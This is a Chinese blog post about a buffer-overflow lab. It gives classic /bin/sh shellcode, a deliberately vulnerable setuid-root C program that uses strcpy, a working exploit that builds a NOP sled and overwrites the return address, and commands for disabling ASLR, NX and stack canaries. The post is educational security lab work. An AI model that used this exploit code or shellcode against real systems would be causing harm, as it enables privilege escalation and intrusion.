【1】缓冲区溢出 strcpy

最新推荐文章于 2021-07-27 21:17:17 发布
最新推荐文章于 2021-07-27 21:17:17 发布
阅读量4.7k 收藏 21
点赞数 5
分类专栏: 缓冲区溢出 文章标签: 缓冲区溢出 strcpy
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36779888/article/details/89682728
版权
本文详细介绍了通过构造特定payload实现缓冲区溢出的过程,利用strcpy函数的漏洞,成功执行shellcode,实现对程序的控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近在做缓冲区溢出实验,总共有6个

目录

shellcode.h

源代码:vul1:

攻击代码:

简单原理说明

环境声明

实验过程

1. 确定要溢出的目标:

2. 构造payload:

3. 编译之后,直接运行结果如下图所示:

总结

shellcode.h

shellcode的作用是运行一个/bin/sh

/*
 * Aleph One shellcode.45个字节
 */
static const char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

源代码:vul1:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int bar(char *arg, char *out)//
{
  strcpy(out, arg);//将arg指向的地址内容拷贝给out所指的地址中去
  return 0;
}

void foo(char *argv[])
//运行bar,由于buf是一个局部变量
//故而经过bar将argv的内容拷贝给了buf指向的地址,造成了栈溢出
//且可以绕过长度限制,构造shellcode覆盖返回地址
{
  char buf[256];
  bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
  if (argc != 2)//保证有参数输入,且为1
    {
      fprintf(stderr, "target1: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  setuid(0);//设置UID为0
  foo(argv);//运行函数foo
  return 0;
}

攻击代码:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/mnt/hgfs/sourcecode/proj1/vulnerables/vul1"//目标文件路径
int main(void)
{
  //211个NOP+45个字节shellcode+8个字节EBP与返回地址 = 264字节
  char payload[264];
  memset(payload,'\x90',211);
  memcpy(payload + 211,shellcode,45);
  memcpy(payload + 256,"\x04\xfc\xff\xbf\x10\xfc\xff\xbf",8);
  char *args[] = { TARGET, payload , NULL};//定义运行参数
  char *env[] = { NULL };//环境变量为NULL

  execve(TARGET, args, env);
// int execve(const char* filename,char* const argv[],char* const envp[]);
// 参数介绍:
// filename:程序所在的路径
// argv:传递给程序的参数,数组指针argv必须以程序(filename)开头,NULL结尾
// envp:传递给程序的新环境变量,无论是shell脚本,还是可执行文件都可以使用此环境变量,必须以NULL结尾
// 函数返回值:
// 成功无返回值,失败返回-1
  fprintf(stderr, "execve failed.\n");

  return 0;
}

简单原理说明

缓冲区溢出通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。
造成缓冲区溢出的主要原因是程序中没有仔细检查用户输入的参数是否合法。

环境声明

LINUX 32位系统

本任务所以实验均在关闭ASLR、NX等保护机制的情况下进行:

1.关闭地址随机化功能:

echo 0 > /proc/sys/kernel/randomize_va_space2. 

2.gcc编译器默认开启了NX选项,如果需要关闭NX(DEP)选项,可以给gcc编译器添加-z execstack参数。

gcc -z execstack -o test test.c

3.在编译时可以控制是否开启栈保护以及程度,

例如:gcc -fno-stack-protector -o test test.c //禁用栈保护

gcc -fstack-protector -o test test.c  //启用堆栈保护,不过只为局部变量中含有char数组的函数插入保护代码

gcc -fstack-protector-all -o test test.c //启用堆栈保护,为所有函数插入保护代码

 

 

实验过程

1. 确定要溢出的目标:

由vulc代码中的bar函数(如图)可知,strcpy由于没有检查拷贝字符串的长度,故而拷贝的长度可能比out本身的长度要大。

而out即foo函数中的buf字符串组,大小为256个字节。故而我们的溢出目标即使buf字符串组产生溢出,以覆盖栈中的数据。

2. 构造payload:

在foo函数中,我们可以看到ebp的大小为0xbffffd10,而buf指向的地址为0xbffffc10,两者相差正好为256个字节。

且由压栈的规则可知,在ebp地址之上保存是上个函数堆栈的ebp与返回地址,而返回地址距离ebp8个字节,故而只需构造264个字节的数据,将shellcode置于其中,最后4个字节为返回地址(buf的地址)即可。

构造之后的payload如下图所示:

3. 编译之后,直接运行结果如下图所示:

可见,成功执行了shellcode,溢出执行成功。

总结

本实验是一个最基本的缓冲区溢出样本,它让我深入浅出的体验了通过缓冲区溢出执行shellcode的感觉,原理基本就是strcpy()函数没有检查copy的长度而导致的溢出

缓冲区溢出及原理
一杯水果茶!足矣~
12-05 1335
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出
缓冲区溢出攻击示例
最新发布
qq_67812668的博客
08-12 1259
缓冲区溢出攻击是利用 缓冲区溢出漏洞 所进行的攻击行动。 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛 存在 。 利用缓冲区溢出攻击,可以导致程序 运行 失败、系统关机、重新启动等后果。 缓冲区 溢出是指当 计算机 向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。 理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。 但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。
strcpy为何不安全
helloworlddm的博客
06-08 8200
文章目录引言函数调用约定(32位)程序编译运行攻击的思路填充数据jum esp地址编写shellcode完整攻击代码攻击效果公众号 引言 在刚刚开始学校C语言的时候,很多人都用过strcpy这个函数。简单说是一个内存复制的函数。这个函数确实非常方便,但是这个函数是非常不安全,由与这个函数而产生的缓冲区溢出漏洞在很多文章中都有所介绍。我们应该摒弃strcpy的使用,而是用strncpy进行代替。 原型声明:char *strcpy(char* dest, const char *src); 头文件:#incl
C中的危险函数(缓冲区溢出)
Quartz's Blog
08-17 3622
导言C语言,自创始以来,到现在经久不衰。虽然C你只好自己造轮子,由于C语言允许直接访问物理地址,可以直接对硬件进行操作,因此它既具有高级语言的功能,又具有低级语言的特性。所以有可移植的汇编之称。 可是也在这些直接对内存的访问,导致了危险的发生。 有了自由也就多了混乱 ————某斯基
strcpy 溢出问题
bigengine的博客
02-05 1312
今天编译一个老程序,后来发现了是strcpy溢出了,这个老程序以前是没问题的,但是strcpy 有一些不确定的行为,和memory layout相关,所以有可能现在版本的编译器导致了这个问题。 这里详细说一下strcpy溢出问题, 简单的说就是strcpy 不考虑目的地址的剩余空间,假设你已经分配了足够的空间, 它会一直赋值到源字符串结尾遇到\0 位置才停止, 所以有可能会触发一些内存
缓冲区溢出strcpy和memcpy
Xor0ne
04-13 4802
问题:不用嵌入式汇编调用和函数调用,仅仅字符串的操作按顺序调用他们。 这个是今天抛出来的一个问题,似乎有着似曾相识的感觉。想到之前老师用strcpy()溢出实现过三个函数的调用,折回去看了一下之前的思路,然后按照题意进行分析。 文章目录方法一:strcpy()函数:易发生\x00截断1strcpy溢出原理简述2、代码示例及分析3、shellcode的构造4、最终代码方法二:memcpy函数溢出1...
Strcpy()函数之溢出定地址
Xor0ne
02-20 828
一、strcpy()函数简介 首先附上一个strcpy()函数简单的溢出示例 参考链接:https://blog.csdn.net/yahohi/article/details/7724669 // test0219_2.cpp : Defines the entry point for the console application. // #include "stdafx.h" #inclu...
strcpy()带来的溢出错误
leek5533的博客
07-10 1124
// (*(std::string*) pValue).assign(sVlaue); *(std::string*) pValue = sVlaue; 1strcpy(d,s); 是将char* s的内容复制到char* d里面; 如果出现s长度大于d的长度就会出现溢出;显示不全; 方法1: 将char* d s转换成为string类型,因为string类型是空间是可以改变的。 方法2: 方法3:不建议 销毁,重新开辟空间:malloc(); ...
缓冲区溢出实验
10-29
**缓冲区溢出实验** 缓冲区溢出是计算机科学中一个重要的安全问题,尤其是在软件开发领域。这个实验将深入探讨这一主题,理解其原理,并学习如何预防和应对这种漏洞。 ### 1. 缓冲区溢出的概念 缓冲区溢出...
缓冲区溢出漏洞研究与进展.pdf
10-29
缓冲区溢出漏洞】 缓冲区溢出漏洞是软件安全中的一个重要问题,它源于编程时对内存管理的不当处理,特别是在使用C/C++等低级语言编写程序时,由于缺乏类型安全检查,容易出现此类问题。缓冲区溢出通常发生在程序...
C和混编混合编程----strcpy缓存溢出原理
qq_41683305的博客
02-12 1068
今天老师给了一到程序,让我们分析分析原理,关于strcpy缓存溢出原理的,反汇编一遍遍调试,终于看明白了,记录一下 C程序: #include "string.h" #include "stdio.h" char *shellcode="\x64\x65\x66\x67\x68\x69\x70\x71\x05\x10\x40\x00"; void fun1(int a, int b) { p...
strcpy的字符串溢出真的很可怕
liuxunfei15的博客
04-20 1968
如图: 按代码逻辑,程序员的想法是校验传入的str字符串密码,是不是"123",如果是的话就打印“Checkpasswordsucceed!”, 反之则打印“Checkpasswordfailed!”。所以当一个人不知道字符串密码的时候,它任意传入一串字符串,就如图中的 ,好家伙,一眼看过去,按代码逻辑来,你是不是觉得校验失败了,然后打印“Checkpasswordfailed!”? 然而,最终的结果却是:校验成功了“Checkpasswordsucceed!” 等你再回头...
strcpy()函数溢出应用(三)之层层变形
Xor0ne
08-22 456
今天写的是之前一直漏掉的一个strcpy()函数的例子,本来以为和我之前找到的那个是一样的,但是今天单步调试后发现还是差别很大,所以打算记录一下,内容原理比较简单,大佬请疯狂鄙视我吧。 今天主要对例子进行讲解,对于strcpy(0函数溢出的原理请参见上一篇文章 strcpy()函数。 1、前景回顾 首先一张图片简单回顾一下strcpy()函数的原理啦(请不是很熟悉的同学看上一篇文章): 2、层层...
strcpy溢出的攻击示例
lonelyrains的专栏
09-02 4694
在学习c/c++的时候,就讲到了一些C类型的字符串函数不是安全的,比如strcpy没有检查长度会溢出,推荐使用strncpy,笔试面试也经常问到。同时经常浏览安全相关的新闻,缓冲区溢出攻击是很常见的一种。那缓冲区溢出为什么可以攻击。今天通过strcpy进行简单的演示。         如下是guess_pwd.cpp代码 #include #include #include
软件安全实验——lab5(Buffer_Overflow缓冲区溢出攻击:strcpy函数溢出覆盖返回地址执行shellcode)
Onlyone_1314的博客
07-27 2634
目录标题2.1初始设置2.2 Shellcode2.3易受攻击程序2.4任务1:利用漏洞1.关闭地址空间随机化,2.execstack和-fno-stack-protector选项3.对stack进行gdb,首先查看bof的起始位置和返回地址.4.确定缓冲区的位置5.开始攻击2.5任务2:地址随机化2.6任务3:堆栈保护2.7任务4:非可执行堆栈 2实验室任务 2.1初始设置   您可以使用我们预先构建的 Ubuntu虚拟机来执行实验室任务。Ubuntu和其他Linux发行版已经实现了一些安全机制,使缓冲区
strcpy 溢出的问题
h0120709330208的专栏
08-27 812
char *a="6789"; char *b="123456789"; strcpy(a,b); printf("%s",a); printf("%s",b); 为什么答案的结果是: 123456789 9 麻烦大家分析一下哈,我知道是溢出了,为什么溢出的结果是这样? #include "stdio.h" #include "string.h" void main() { char *
缓冲区溢出保护实例 strcpy
weixin_45019830的博客
04-22 1685
在关闭缓冲区溢出保护后进行编译:(Ubuntu 12.04 32位,gcc版本4.6.3) gcc -fno-stack-protector -z execstack -o pwd.out pwc.c 在命令行输入 ./pwd.out运行, 发现输入:1111111112344444等字符串时会提示密码不正确,而在输入qqqqqqqq、 12355555时会提示密码正确。 (1)分析这些现象产...
一个strcpy溢出例子
积跬步
02-18 2181
编译器gcc [cpp] view plaincopyprint? char s[]="123456789";  char d[]="123";  strcpy(d,s);  printf("result: %s, \n%s",d,s);   char s[]="123456789"; char d[]="123"; strcpy(d,s); printf(
Windows缓冲区溢出攻防详解
"缓冲区溢出之道txt文件" 缓冲区溢出是计算机编程中的一种常见安全漏洞,主要发生在处理数据输入时,程序没有正确地检查数据的边界,导致数据超出预定的存储空间,溢出到相邻的内存区域。这种现象在Windows系统中尤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值